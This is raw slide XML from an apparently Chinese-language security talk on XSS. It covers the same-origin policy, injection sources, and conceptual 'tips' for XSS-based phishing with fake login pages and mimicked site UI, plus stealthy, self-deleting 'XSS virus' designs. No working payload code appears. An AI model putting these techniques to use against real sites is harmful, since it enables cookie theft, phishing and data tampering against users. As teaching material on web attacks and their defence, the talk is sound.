                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.baidu.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" smtClean="0"/>
              <a:t>被劫持为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" smtClean="0"/>
              <a:t>xeye.us</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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518309"/>
            <a:ext cx="7957368" cy="3696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92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>能做什么</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="92D05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smtClean="0"/>
              <a:t>挂马</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>盗取用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>客户端浏览器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>钓鱼攻击，高级钓鱼技巧</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>编写针对性的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS VIRUS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，删除目标文章、恶意篡改数据、嫁祸、“借刀杀人”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>劫持用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>行为</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>甚至进一步渗透内网</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>爆发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Web2.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>蠕虫</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>蠕虫式的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>蠕虫式挂马攻击、刷广告、刷流量、破坏网上数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean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smtClean="0"/>
              <a:t>同源策略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mtClean="0"/>
              <a:t>在下一页的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Tips</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>之前应该提下同源策略</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>在浏览器中有一个非常重要的概念：同源策略。它是指客户端脚本应该只被允许访问与自己在同域内的资源，这里的同域是指同协议、同域名、同端口的严格同域</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>为什么需要同源策略</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>你的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>gmail cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>就不会被另一个域的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>读取</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>你</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>xiaonei.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>上的隐私数据就不会被另一域的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>读取、篡改、删除等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>有两种情况可以这样做：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、同源策略</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、你所在的域允许与其他域在客户端上通讯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>…</a:t>
            </a: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smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" smtClean="0"/>
              <a:t>War, Browsers War!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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>能做的事那么多</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>浏览器是主战场</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>同源策略是安全分界线</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>可以是特洛伊、可以变为冷兵器、可以化身刺客、可以自我繁殖出战争兵团</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>这个世界有秩序，不过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>……</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>是用来打破的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>说说两个有点意思的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Tips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92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="92D05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smtClean="0"/>
              <a:t>XSS(Cross-Site Scripting)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>即跨站脚本攻击，这类攻击发生在客户端，是攻击者将恶意代码注入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>客户端，从而影响到其他浏览此</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>界面的用户</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>注入的恶意代码包括：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>危险的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>标签、客户端脚本、其它能执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的容器等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>大多数时候与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>有关</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="420624" lvl="1" indent="-384048">
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3000" smtClean="0"/>
              <a:t>注入源</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>form: post/get</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>url parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" smtClean="0"/>
              <a:t>cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" smtClean="0"/>
              <a:t>header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" smtClean="0"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" smtClean="0"/>
              <a:t>媒体文件的内容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" smtClean="0"/>
              <a:t>一句话概括：只要是输入点都可以是注入源</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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57488" y="2714620"/>
            <a:ext cx="3610284" cy="830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CN" sz="4800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>phishing tips</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="480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smtClean="0"/>
              <a:t>Phishing Tips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smtClean="0"/>
              <a:t>很多钓鱼不需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，关键是社工</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>传统钓鱼</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>假冒域名，假冒登录页面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>邮件钓鱼、短消息钓鱼、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>消息钓鱼等都是发送诱惑性的欺骗信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>这类钓鱼攻击的检测与防御在技术层面可实现的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>其实还可以更好玩</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>DHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>驱动的网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>UI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>只要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>发生，这些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>UI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>都可以模仿</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>让你的攻击就像是网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>原生态</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>产物</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>目标站点有多炫你的钓鱼攻击就多炫</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>技术层面上对这类钓鱼的检测是很困难的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>…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smtClean="0"/>
              <a:t>Phishing Tips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邮件钓鱼中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>出一个假登录页面，对于很多人来说这个欺骗还是很大的，目前也是使用比较多的钓鱼攻击手法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>下面换种方式进行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>有些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>UI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>可以很好模仿</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>……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smtClean="0"/>
              <a:t>Phishing Tips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6463" y="1500174"/>
            <a:ext cx="7329487" cy="509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6463" y="1477984"/>
            <a:ext cx="7329487" cy="509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85851" y="1500174"/>
            <a:ext cx="7329487" cy="509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06463" y="1477984"/>
            <a:ext cx="7329487" cy="509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71736" y="2714620"/>
            <a:ext cx="4280211" cy="830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CN" sz="4800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS Virus Tips</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="480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smtClean="0"/>
              <a:t>XSS Virus Tips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smtClean="0"/>
              <a:t>针对性的破坏</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>破坏目标的网上数据，如果顺便挂马的话，即将威胁带到浏览器之外</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS Worm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>不一样的是，它不传播开</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>借助宿主环境中一切能借用的资源</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>各种原生态的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>模块、函数、数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>各式存储空间：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>flash cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、数据库、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> userData</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>各种与外域通讯的方法：借用宿主环境中的各种外域通讯功能</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS Virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的几个性质</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>隐蔽性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>寄生</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>自我删除</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>与外域通讯能力</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>…</a:t>
            </a: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smtClean="0"/>
              <a:t>XSS Virus Tips</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="圆角矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4100962" y="5072074"/>
            <a:ext cx="4000528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bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>cookie/flash cookie/userData/etc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>local xss virus codz(shellcode)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85852" y="3131106"/>
            <a:ext cx="1857388" cy="92869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xss exp(attacker page)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857224" y="1571612"/>
            <a:ext cx="2714644" cy="571504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remote xss virus codz(shellcode)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="直接箭头连接符 11"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="2"/>
            <a:endCxn id="7" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1720551" y="2637111"/>
            <a:ext cx="9879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357818" y="3143248"/>
